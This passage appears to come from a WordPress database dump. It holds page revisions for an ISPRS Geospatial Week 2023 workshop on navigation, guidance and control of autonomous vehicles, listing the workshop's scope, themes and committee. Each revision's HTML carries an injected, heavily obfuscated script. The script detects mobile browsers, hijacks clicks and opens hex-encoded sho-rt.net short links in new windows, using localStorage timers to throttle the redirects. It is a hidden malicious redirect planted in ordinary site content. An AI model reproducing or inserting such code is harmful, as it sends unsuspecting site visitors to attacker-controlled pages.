_0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','NGC of AV: Navigation, Guidance and Control of Autonomous Vehicles','','inherit','closed','closed','','2856-revision-v1','','','2022-10-14 22:37:10','2022-10-14 22:37:10','',2856,'https://gsw2023.com/?p=2867',0,'revision','',0),
(2868,1,'2022-10-14 22:37:26','2022-10-14 22:37:26','<p>[vc_row][vc_column width=\"2/3\"][vc_column_text]</p>\n<h5><strong>Scope:</strong></h5>\n<h5><strong>Integrated Wireless, Multi-Sensor, Multi-Perception Systems for High-Precision Positioning, Guidance and Control of Autonomous Vehicles</strong></h5>\n<p>[/vc_column_text][vc_column_text]</p>\n<h6 style=\"text-align:justify; color:black;\"><strong>Autonomous vehicles (AVs) promise to enhance safety, reduce emissions, and improve transportation system efficiency and reliability. The growing demand for AVs is shaping the future of the automotive industry by transforming the in-vehicle experience and paving the way for large-scale implementation of autonomous driving. The positioning, guidance, and control technologies for future Avs are rapidly advancing. They require on onboard intelligence relying on a suite of sensors and systems such as global navigation satellite systems (GNSS) receivers, mmWave wireless technology (5G/6G), vehicle motion sensors and remote sensing systems including cameras, light detection and ranging (LiDAR) and radar. AVs that can sense the environment and navigating without human input require robust advanced positioning, navigation, and guidance for efficient operation in all environments and weather conditions. The availability of the above sensors and systems in future AVs provides an attractive opportunity to advance the robustness and safety of autonomous driving. This workshop will seek original contributions covering advanced topics related to the state of the art and future trends of positioning and mapping as well as control and guidance technologies for autonomous vehicles and future self-driving.</strong></h6>\n<h6><strong>The workshop will be part of the ISPRS Geospatial Week 2023 and is hosted the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) in parallel with several related geospatial workshops.</strong></h6>\n<p>.[/vc_column_text][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"2860\" img_size=\"600x400\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: left;\">CHAIRS</h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"53\"][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:Blue;\"><strong><u>Themes:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>GNSS based high precision positioning in challenging urban environments.</strong></h6>\n</li>\n<li>\n<h6><strong>New wireless technologies and methods for AV connectivity, cooperative perception, positioning, and path planning.</strong></h6>\n</li>\n<li>\n<h6><strong>Recent technical advances in perception systems meeting the growing AV demands.</strong></h6>\n</li>\n<li>\n<h6><strong>Advanced AI-based multi-system fusion for positioning, mapping, and guidance.</strong></h6>\n</li>\n<li>\n<h6><strong>Machine-learning based object identification, classification, and mapping.</strong></h6>\n</li>\n<li>\n<h6><strong>Innovative self-Localization and mapping (SLAM).</strong></h6>\n</li>\n<li>\n<h6><strong>Control of AVs and mobile robots.</strong></h6>\n</li>\n<li>\n<h6><strong>Communication schemes for multiple AVs.</strong></h6>\n</li>\n<li>\n<h6><strong>Innovations in other autonomous systems (UAVs, UGVs, and drones)</strong></h6>\n</li>\n<li>\n<h6><strong>Applications of AVs.</strong></h6>\n</li>\n</ul>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:blue;\"><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Cairo Lúcio Nascimento Junior, ITA, Brazil</strong></h6>\n</li>\n<li>\n<h6><strong>Peter Travis Jardine, Royal Military College of Canada, ON, Canada</strong></h6>\n</li>\n<li>\n<h6><strong>Mohamed Tamazin, Orolia, Montreal, QC, Canada</strong></h6>\n</li>\n<li>\n<h6><strong>Paul Hershey, Raytheon, USA (I still need to confirm with him)</strong></h6>\n</li>\n<li>\n<h6><strong>Mohamed Elhabiby, Micro Engineering Technologies Inc.</strong></h6>\n</li>\n<li>\n<h6><strong>Caroline Channel, ISAE-Supaero, France</strong></h6>\n</li>\n<li>\n<h6><strong>Ashraf Abosekeen, Military Technical College, Cairo, Egypt.</strong></h6>\n</li>\n<li>\n<h6><strong>Umar Iqbal, Mississippi State University, USA</strong></h6>\n</li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','NGC of AV: Navigation, Guidance and Control of Autonomous Vehicles','','inherit','closed','closed','','2856-revision-v1','','','2022-10-14 22:37:26','2022-10-14 22:37:26','',2856,'https://gsw2023.com/?p=2868',0,'revision','',0),
(2869,1,'2022-10-14 22:40:10','2022-10-14 22:40:10','[vc_row][vc_column width=\"2/3\"][vc_column_text]\r\n<h5><strong>Scope:</strong></h5>\r\n<h5><strong>Integrated Wireless, Multi-Sensor, Multi-Perception Systems for High-Precision Positioning, Guidance and Control of Autonomous Vehicles</strong></h5>\r\n[/vc_column_text][vc_column_text]\r\n<h6 style=\"text-align: justify; color: black;\"><strong>Autonomous vehicles (AVs) promise to enhance safety, reduce emissions, and improve transportation system efficiency and reliability. The growing demand for AVs is shaping the future of the automotive industry by transforming the in-vehicle experience and paving the way for large-scale implementation of autonomous driving. The positioning, guidance, and control technologies for future Avs are rapidly advancing. They require on onboard intelligence relying on a suite of sensors and systems such as global navigation satellite systems (GNSS) receivers, mmWave wireless technology (5G/6G), vehicle motion sensors and remote sensing systems including cameras, light detection and ranging (LiDAR) and radar. AVs that can sense the environment and navigating without human input require robust advanced positioning, navigation, and guidance for efficient operation in all environments and weather conditions. The availability of the above sensors and systems in future AVs provides an attractive opportunity to advance the robustness and safety of autonomous driving. This workshop will seek original contributions covering advanced topics related to the state of the art and future trends of positioning and mapping as well as control and guidance technologies for autonomous vehicles and future self-driving.</strong></h6>\r\n<h6><strong>The workshop will be part of the ISPRS Geospatial Week 2023 and is hosted the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) in parallel with several related geospatial workshops.</strong></h6>\r\n.[/vc_column_text][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"2860\" img_size=\"600x400\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h1 style=\"text-align: left;\">CHAIRS</h1>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"53\"][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<h5 style=\"text-align: justify; color: blue;\"><strong><u>Themes:</u></strong></h5>\r\n<ul>\r\n 	<li>\r\n<h6><strong>GNSS based high precision positioning in challenging urban environments.</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>New wireless technologies and methods for AV connectivity, cooperative perception, positioning, and path planning.</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Recent technical advances in perception systems meeting the growing AV demands.</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Advanced AI-based multi-system fusion for positioning, mapping, and guidance.</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Machine-learning based object identification, classification, and mapping.</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Innovative self-Localization and mapping (SLAM).</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Control of AVs and mobile robots.</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Communication schemes for multiple AVs.</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Innovations in other autonomous systems (UAVs, UGVs, and drones)</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Applications of AVs.</strong></h6>\r\n</li>\r\n</ul>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_column_text]\r\n<h5 style=\"text-align: justify; color: blue;\"><strong><u>Scientific Committee:</u></strong></h5>\r\n<ul>\r\n 	<li>\r\n<h6><strong>Cairo Lúcio Nascimento Junior, ITA, Brazil</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Peter Travis Jardine, Royal Military College of Canada, ON, Canada</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Mohamed Tamazin, Orolia, Montreal, QC, Canada</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Paul Hershey, Raytheon, USA (I still need to confirm with him)</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Mohamed Elhabiby, Micro Engineering Technologies Inc.</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Caroline Channel, ISAE-Supaero, France</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Ashraf Abosekeen, Military Technical College, Cairo, Egypt.</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Umar Iqbal, Mississippi State University, USA</strong></h6>\r\n</li>\r\n</ul>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a 